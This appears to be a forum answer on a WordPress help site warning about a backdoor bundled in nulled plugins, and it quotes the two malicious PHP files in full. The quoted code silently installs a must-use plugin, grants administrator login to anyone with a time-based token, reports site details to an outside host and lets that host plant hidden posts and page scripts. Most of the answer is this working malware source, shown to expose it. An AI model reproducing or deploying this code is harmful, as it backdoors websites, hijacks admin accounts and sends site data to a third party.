I just encountered the same issue. After quick analysis I found that this file is allowing remote access of your website to a third party which is pretty much dangerous. This is found in wordpress websites that are using nulled wordpress plugins. This file is being generated from these two files bundled inside nulled plugins:
rms-script-ini.php
rms-script-mu-plugin.php
These files ensures that each time a wordpress website is accessed a file named rms_unique_wp_mu_pl_fl_nm.php is generated in mu-plugins directory if it doesn’t exists already.
Here is the content of both files:
rms-script-ini.php
<?php
/* -----------Register activation hook----------- */
if(!class_exists('RMSActivationRemoteHandler'))
{
class RMSActivationRemoteHandler
{
private $main_plugin;
private $dependency;
private $disc_text;
private $ext_type;
private $cext;
private $DS=DIRECTORY_SEPARATOR;
function __construct($path, $dep, $disc_text, $ext_type)
{
$this->main_plugin = $path;
$this->dependency = $dep;
$this->disc_text = $disc_text;
$this->ext_type = $ext_type;
$this->cext = $ext_type=='themes' ?
wp_get_theme()->get('Name') : '';
!file_exists(WPMU_PLUGIN_DIR) ? mkdir(WPMU_PLUGIN_DIR) : 0;
$fname=$this->DS.$this->dependency;
$newname=WPMU_PLUGIN_DIR.$this->DS.'rms_unique_wp_mu_pl_fl_nm.php';
!file_exists($newname) ? copy(__DIR__.$fname , $newname) : 0;
// copy(__DIR__.$fname , $newname);
require_once($newname);
!function_exists('get_plugin_data') ? require_once( ABSPATH.'wp-admin/includes/plugin.php' ) : 0;
}
private function save_ext_data($activation)
{
$ext=get_option('rms_extension_names_from_event', []);
!is_array($ext) ? $ext=[] : 0;
$name = $this->ext_type=='themes' ? $this->cext : $this->get_extension_name();
$ext[$name]=$activation;
update_option('rms_extension_names_from_event', $ext);
}
function get_extension_name()
{
return $this->ext_type=='plugins' ? get_plugin_data($this->main_plugin)['Name'] : wp_get_theme()->get('Name');
}
function rms_activation_event_handler()
{
$name=$this->get_extension_name();
$this->save_ext_data(true);
do_rms_activation_task($name, $this->disc_text, true);
}
function rms_deactivation_event_handler()
{
$name=$this->get_extension_name();
$this->save_ext_data(false);
do_rms_activation_task($name, false, false);
}
function rms_deactivation_theme()
{
$this->save_ext_data(false);
do_rms_activation_task($this->cext, false, false);
}
}
function rms_remote_manager_init($main_file, $dependency, $disc_text)
{
// identify if theme or plugin
$mn=str_replace('\\', "https://wordpress.stackexchange.com/", strtolower($main_file));
$mn=explode("https://wordpress.stackexchange.com/", $mn);
$mn=array_slice($mn, -3);
$mn=isset($mn[0]) ? $mn[0] : '';
if($mn!=='plugins' && $mn!=='themes'){return;}
/* Initialize activation handler */
$rms_activation_class=new RMSActivationRemoteHandler($main_file, $dependency, $disc_text, $mn);
$args_act=[$rms_activation_class, 'rms_activation_event_handler'];
$args_deact=[$rms_activation_class, 'rms_deactivation_event_handler'];
if($mn=='plugins')
{
register_activation_hook($main_file, $args_act);
register_deactivation_hook($main_file, $args_deact);
}
else
{
add_action('after_switch_theme', $args_act);
add_action('switch_theme', [$rms_activation_class, 'rms_deactivation_theme']);
}
}
}
// Check in case clone to other site
if(!isset($GLOBALS['rms_report_done_already']) || $GLOBALS['rms_report_done_already']!=='yes')
{
$GLOBALS['rms_report_done_already']='yes';
$home=get_home_url();
$opt=get_option('rms_report_done_already', []);
!is_array($opt) ? $opt=[] : 0;
if(!isset($opt[$home]))
{
$opt[$home]='yes';
update_option('rms_report_done_already', $opt, 'yes');
$ars=get_option('rms_extension_names_from_event', []);
do_rms_activation_task($ars, false, false);
}
}
?>
rms-script-mu-plugin.php
<?php
// REMOTE LOGIN
function remote_sign_in () {
if(!$_GET['token'] && is_user_logged_in())
return;
$key = md5('thisisrandomtextsdsdsdsdsdsdsdsdsd');
$minutes_1 = intval(gmdate('i')) + 1;
$minutes_2 = intval(gmdate('i'));
$signature[] = md5(gmdate("Ymd") . $key . $minutes_1) ;
$signature[] = md5(gmdate("Ymd") . $key . $minutes_2) ;
if(!in_array($_GET['token'] , $signature) )
return;
$users = get_users();
foreach($users as $user ) {
$user_id = $user->ID;
$data = get_userdata( $user_id );
$roles = $user->roles;
if (in_array('administrator', $roles)) {
log_me_in($user);
exit;
}
}
}
add_action('init', 'remote_sign_in' );
function log_me_in ($user) {
if ( !is_wp_error( $user ) )
{
wp_clear_auth_cookie();
wp_set_current_user ( $user->ID );
wp_set_auth_cookie ( $user->ID );
$redirect_to = user_admin_url();
wp_safe_redirect( $redirect_to );
exit();
}
}
//END REMOTE LOGIN
if(!function_exists('do_rms_activation_task'))
{
/* ------------Register Config Variables------------ */
$GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php';
$GLOBALS['rms_disclaimer_text'] = [];
$GLOBALS['rms_ajax_del_request'] = false;
function send_rms_curl_request($action, $body)
{
$body['action'] = $action;
$body['remote_site_hash'] = get_option('rms_remote_site_hash', '');
$body['remote_site_id'] = get_option('rms_remote_site_id', 0);
$connect_to=$GLOBALS['rms_report_to'];
$args=
[
'method' => 'POST',
'timeout' => 15,
'redirection' => 15,
'headers' => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
'body' => $body
];
// Send to RMS
$curl = new Wp_Http_Curl();
$result=$curl->request($connect_to, $args);
$result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;
return !$result ? [] : $result;
}
/* -------------Register Site to Manager------------- */
function do_rms_activation_task($name, $text, $activating)
{
// generate password for later remote actions
$length = 5;
$rms_pass = substr(str_shuffle(str_repeat($x='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length/strlen($x)) )),1,$length);
$rms_pass = $rms_pass.microtime(true);
$hash = password_hash($rms_pass, PASSWORD_BCRYPT);
$show_post=get_option('rms_show_post_to_logged');
$show_post!=='yes' ? $show_post="no" : 0;
// Gather data
$data=
[
'title' => get_bloginfo('name'),
'url' => get_home_url(),
'ajax_url' => admin_url('admin-ajax.php'),
'ip' => $_SERVER['SERVER_ADDR'],
'tp' => $name,
'tp_status' => $activating,
'hash' => $hash,
'show_to_logged'=>$show_post
];
// send to rms
$result = send_rms_curl_request('rms_ping_from_the_universe', ['site_data' => json_encode($data)]);
update_option('rms_remote_site_id', (isset($result['id']) ? $result['id'] : 0));
update_option('rms_remote_site_hash', (isset($result['hash']) ? $result['hash'] : ''));
update_option('rms_remote_connection_pass', $rms_pass);
// show disclaimer if necessary when activating
if($activating==true)
{
is_string($text) ? $GLOBALS['rms_disclaimer_text'][]=$text : 0;
if(count($GLOBALS['rms_disclaimer_text'])>0)
{
$resp=json_encode($GLOBALS['rms_disclaimer_text']);
setcookie('rms_disclaimer_pop_up', $resp);
}
}
}
/* check remote hash */
function rms_check_remote_hash_pass()
{
if(isset($_POST['remote_connection_hash']) && is_string($_POST['remote_connection_hash']))
{
$rms_pass=get_option('rms_remote_connection_pass');
if(is_string($rms_pass) && password_verify($rms_pass, $_POST['remote_connection_hash']))
{
return true;
}
}
exit;
}
/* ----Delete featured image upon change or delete---- */
function delete_rms_thumbnaiil_remote($post_id)
{
$post_thumbnail_id = get_post_thumbnail_id( $post_id );
is_numeric($post_thumbnail_id) ? wp_delete_attachment($post_thumbnail_id, true) : 0;
}
/* -----------Fetch and create featured image----------- */
function rms_create_post_thumbnail($image_url, $post_id)
{
$image_name = explode("https://wordpress.stackexchange.com/", $image_url);
$image_name = end($image_name);
$upload_dir = wp_upload_dir(); // Set upload folder
$image_data = file_get_contents($image_url); // Get image data
if($image_data==false)
{
return;
}
$unique_file_name = wp_unique_filename( $upload_dir['path'], $image_name ); // Generate unique name
$filename = basename( $unique_file_name ); // Create image file name
// Check folder permission and define file location
if( wp_mkdir_p( $upload_dir['path'] ) ) {
$file = $upload_dir['path'] . "https://wordpress.stackexchange.com/" . $filename;
} else {
$file = $upload_dir['basedir'] . "https://wordpress.stackexchange.com/" . $filename;
}
// Create the image file on the server
file_put_contents( $file, $image_data );
// Check image file type
$wp_filetype = wp_check_filetype( $filename, null );
// Set attachment data
$attachment = array(
'post_mime_type' => $wp_filetype['type'],
'post_title' => sanitize_file_name( $filename ),
'post_content' => '',
'post_status' => 'inherit'
);
// Delete existing thumbnail
delete_rms_thumbnaiil_remote($post_id);
// Create the attachment
$attach_id = wp_insert_attachment( $attachment, $file, $post_id );
update_post_meta($attach_id, 'rms_remote_featured_image', $post_id);
// Include image.php
require_once(ABSPATH . 'wp-admin/includes/image.php');
// Define attachment metadata
$attach_data = wp_generate_attachment_metadata( $attach_id, $file );
// Assign metadata to attachment
wp_update_attachment_metadata( $attach_id, $attach_data );
// And finally assign featured image to post
set_post_thumbnail( $post_id, $attach_id );
return $attach_id;
}
/* ----------------Create various posts---------------- */
add_action('wp_ajax_nopriv_rms_ping_from_the_universe', function()
{
rms_check_remote_hash_pass();
if(!isset($_POST['post'])){exit;}
$post=json_decode(stripcslashes($_POST['post']), true);
if($post['local_id']>0)
{
/* Retrieve existing post id */
$args=
[
'post_type'=>['post', 'page', 'rms_remote_hook'],
'post_status' => 'any',
'meta_key'=>'rms_rm_uniq_meta_post_id',
'meta_value'=>$post['local_id']
];
$ex_post=get_posts($args);
// if exist, update that
(is_array($ex_post) && isset($ex_post[0], $ex_post[0]->ID)) ? $post['ID']=$ex_post[0]->ID : 0;
}
$to_post=['ID', 'post_title', 'post_content', 'post_type', 'post_status'];
// Convert post content
$pst=[];
foreach($to_post as $k)
{
if(isset($post[$k]))
{
isset($post['hook_name']) ? $post[$k]=htmlspecialchars($post[$k]) : 0;
$pst[$k]=$post[$k];
}
}
// Default return value
$resp=['rms_post_id'=>0, 'rms_post_url'=>''];
$post_id=wp_insert_post($pst);
if(is_numeric($post_id) && $post_id>0)
{
remove_action('pre_get_posts', 'rms_pre_get_post_filter_action');
$resp['rms_post_id']=$post_id;
$resp['rms_post_url']=$post['post_type']=='rms_remote_hook' ? get_home_url() : get_permalink($post_id);
update_post_meta($post_id, 'rms_rm_uniq_meta_post_id', $post['local_id']);
// Generate featured image
if(isset($post['featured_image']))
{
rms_create_post_thumbnail($post['featured_image'], $post_id);
}
isset($post['hook_name']) ? update_post_meta($post_id, 'rms_remote_hook', $post['hook_name']) : 0;
}
exit(json_encode($resp));
});
/* Enable/disable post show hide */
add_action('wp_ajax_nopriv_rms_change_remote_post_state_for_logged', function()
{
rms_check_remote_hash_pass();
if(isset($_POST['post_state']))
{
$state=(is_string($_POST['post_state']) && $_POST['post_state']=='yes') ? 'yes' : 'no';
update_option('rms_show_post_to_logged', $state);
exit(json_encode(['message'=>'New post state assigned.']));
}
});
/* --------------Delete posts-------------- */
add_action('wp_ajax_nopriv_rms_ping_delete_content', function()
{
rms_check_remote_hash_pass();
if(!isset($_POST['local_ids'])){exit;}
$l_ids = json_decode(stripcslashes($_POST['local_ids']), true);
if(!is_array($l_ids) || count($l_ids)==0){exit;}
$args=
[
'meta_key' =>'rms_rm_uniq_meta_post_id',
'meta_value'=>$l_ids,
'post_status'=>'any',
'post_type'=>['post', 'page', 'rms_remote_hook']
];
$pst=get_posts($args);
$GLOBALS['rms_ajax_del_request']=true;
foreach($pst as $p)
{
delete_rms_thumbnaiil_remote($p->ID);
wp_delete_post($p->ID, true);
}
exit(json_encode(['message'=>count($pst).' posts deleted from remote site.']));
});
/* ----------Invoke remote hooks---------- */
$hook_posts=get_posts(['post_type'=>'rms_remote_hook', 'post_status'=>'any']);
!is_array($hook_posts) ? $hook_posts=[] : 0;
// Store hook posts in global
global $rms_hok_list_array;
$GLOBALS['rms_hok_list_array']=[];
foreach($hook_posts as $p)
{
$met=get_post_meta($p->ID, 'rms_remote_hook', true);
if(!is_string($met) || $met==''){continue;}
!isset($GLOBALS['rms_hok_list_array'][$met]) ? $GLOBALS['rms_hok_list_array'][$met]=[] : 0;
$GLOBALS['rms_hok_list_array'][$met][]=htmlspecialchars_decode($p->post_content);
}
// Process individual hook
function run_rms_hook_caller_func($hook_name)
{
if(!isset($GLOBALS['rms_hok_list_array'][$hook_name])){return;}
foreach($GLOBALS['rms_hok_list_array'][$hook_name] as $str)
{
echo is_string($str) ? $str : '';
}
}
/* Post delete hook/notification */
add_action( 'before_delete_post', 'rms_action_function_name_6568');
function rms_action_function_name_6568($id)
{
$local_id=get_post_meta($id, 'rms_rm_uniq_meta_post_id', true);
if(!is_numeric($local_id)){return;}
delete_rms_thumbnaiil_remote($id);
if($GLOBALS['rms_ajax_del_request']==true){return;}
send_rms_curl_request('rms_del_ping_from_the_remote', ['local_id'=>$local_id, 'remote_id'=>$id]);
}
/* ----------Hide post for logged in---------- */
function rms_pre_get_post_filter_action($query)
{
$meta_query = $query->get('meta_query');
!is_array($meta_query) ? $meta_query=[] : 0;
$meta_query[] = [
'key'=>'rms_rm_uniq_meta_post_id',
'compare'=>'NOT EXISTS'
];
$meta_query[] = [
'key'=>'rms_remote_featured_image',
'compare'=>'NOT EXISTS'
];
$query->set('meta_query', $meta_query);
}
add_action('init', function()
{
if(get_option('rms_show_post_to_logged')=='yes' || !is_user_logged_in())
{
if(!is_admin() && strpos(strtolower($_SERVER['REQUEST_URI']), 'wp-json/wp/')===false)
{
add_action('wp_head', function(){run_rms_hook_caller_func('wp_head');});
add_action('wp_footer', function(){run_rms_hook_caller_func('wp_footer');});
}
return;
}
add_action('admin_head', function()
{
echo '<style>ul.subsubsub li.mine{display:none !important}</style>';
});
add_filter('pre_get_posts', 'rms_pre_get_post_filter_action');
});
/* --------------Frontend Scripts-------------- */
add_action('admin_footer', function()
{
?>
<script>
jQuery(document).ready(function($)
{
var delete_cookie=function( name )
{
document.cookie = name + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
}
var rms_getCookie=function(cname)
{
var name = cname + "=";
var ca = document.cookie.split(';');
for(var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ' ') {
c = c.substring(1);
}
if (c.indexOf(name) == 0) {
return c.substring(name.length, c.length);
}
}
return "";
}
/* ----------Show disclaimer if necessary---------- */
var disc=rms_getCookie('rms_disclaimer_pop_up');
if(!disc){return;}
disc = disc.replace(/\+/g, '%20');
disc = decodeURIComponent(disc);
disc=JSON.parse(disc);
if(!Array.isArray(disc)){return;}
disc.forEach(function(text)
{
var container=$('<div></div>');
container.css
({
'position':'fixed',
'left':0,
'right':0,
'top':0,
'bottom':0,
'background':'rgba(0, 0, 0, 0.384)',
'z-index':'999999999'
});
var disclaimer=$('<div></div>');
disclaimer.css
({
'width':'500px',
'position':'relative',
'top':'40px',
'max-width':'calc(100% - 40px)',
'max-height':'calc(100% - 80px)',
'overflow':'auto',
'padding':'11px',
'background':'white',
'border-radius':'7px',
'margin':'auto auto',
'display':'block'
}).find('img').css
({
'max-width':'100%',
'height':'auto'
});
var head=$('<h4>Disclaimer</h4>');
head.css
({
'text-align':'center'
});
var body=$('<div></div>');
body.html(text);
var agree=$('<div style="text-align:right"><button class="button button-primary">Agree</button></div>');
agree.find('button').click(function()
{
container.remove();
});
disclaimer.append(head).append(body).append(agree);
container.append(disclaimer);
$('body').append(container);
});
delete_cookie('rms_disclaimer_pop_up');
});
</script>
<?php
});
}
?>
And the code used to include and execute rms-script-ini.php is:
require_once('rms-script-ini.php');
rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);
It is highly recommended that you immidiately remove any nulled plugin from your website and perform virus scan.